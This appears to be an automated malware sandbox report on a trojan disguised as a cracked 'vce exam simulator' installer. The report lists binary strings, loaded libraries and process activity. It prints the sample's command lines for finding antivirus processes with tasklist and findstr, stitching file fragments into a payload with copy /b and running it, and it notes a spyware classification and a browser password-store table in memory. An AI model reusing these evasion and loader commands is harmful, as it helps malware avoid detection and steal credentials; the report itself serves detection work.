            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: roupTag)$(DateTakenRange)$([ ]GroupTag)$(GroupTag[ ])$(AcquisitionDate)$(GroupTag[ ])$(DateTaken)$(GroupTag[ ])$(DateTakenRange)$(GroupTag)$(DownloadedAlbums[\])$(OwnerName[\])$(AlbumName)$(DownloadedAlbums[\])$(AlbumName)$(GroupTag[ ])$(AcquisitionSequence).$(OriginalExtension)$(OriginalFilename).$(OriginalExtension)$(RelativePathname[\])$(OriginalFilename).$(OriginalExtension)$(AlbumName).$(OriginalExtension)$(GroupTag[ ])$(DateTimeTaken).$(OriginalExtension)$(D vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameiisui.dll\ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Data.Entity.Design.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameVSAvb7RTUI.DLL^ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMDMINST.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Web.Entity.Design.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdatt.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSJIN vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCasPol.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePerceptionSimulation.ProxyStubs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWABSyncProvider.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameapInit vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDataSvcUtil.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsador15.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Web.Services.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePerfCounterInstaller.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameiologmsg.dl. vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamenetfxconfig.dllj vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesysglobl.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemrt100.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMMRes.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSBuild.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodbccr32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamentlanui2.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameProximityCommon.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemprext.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDELEGATORPROVIDER.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameVirtualDisplayManager.ProxyStubs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesystem.management.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodpdx32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamenetbios.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameappxreg.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: vce exam simulator 2.2.1 crackk.exeBinary string: ComponentIdBTH\MS_BTHPANNdi\InterfacesUpperRangendis4ndis5ndis5_ipndis4bdandis1394LowerRangeLocalTalkNetCfgInstanceIdCharacteristics\Device\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Server\ServerLevels\ServerCoreServerCoreExtendedServer-Gui-MgmtServer-Gui-Shell
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: .SLN,
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: .SLN
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: , MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU")
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/21@2/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Users\user\AppData\Local\Temp\nsa86B2.tmpJump to behavior
            Source: vce exam simulator 2.2.1 crackk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: vce exam simulator 2.2.1 crackk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.23%
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: . \r\n\r\n/InstallStateDir=[
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile read: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe "C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe"
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 459250
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Sorry" Branches
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\459250\Spa.com Spa.com y
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 459250Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Sorry" Branches Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk yJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\459250\Spa.com Spa.com yJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: vce exam simulator 2.2.1 crackk.exeStatic file information: File size 927079465 > 1048576
            Source: vce exam simulator 2.2.1 crackk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: hmmapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: umdmxfrm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdadc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mprext.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msident.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pstorec.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odpdx32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifmon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ODBCCR32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ws2help.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-shutdown-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: fvecerts.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscat32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: framedyn.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msctfui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mprext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WinSyncMetastore.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hnetmon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: CHxReadingStringIME.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: dfshim.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscpxl32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaenum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapiperf.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mgmtapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: licmgr10.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: nddeapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-sysinfo-l1-2-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMTCTRLN.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcji32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wshunix.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-xstate-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMEDICAPICCPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tpmcompc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pdhui.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-datetime-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: httpai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: netfxconfig.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcbcp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfdvdec.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shpafact.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: httpai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdasc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rasctrs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msafd.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: clb.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaenum.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spnet.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mssip32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmpbk32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msident.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscpxl32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_qcx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: securebootai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VscMgrPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
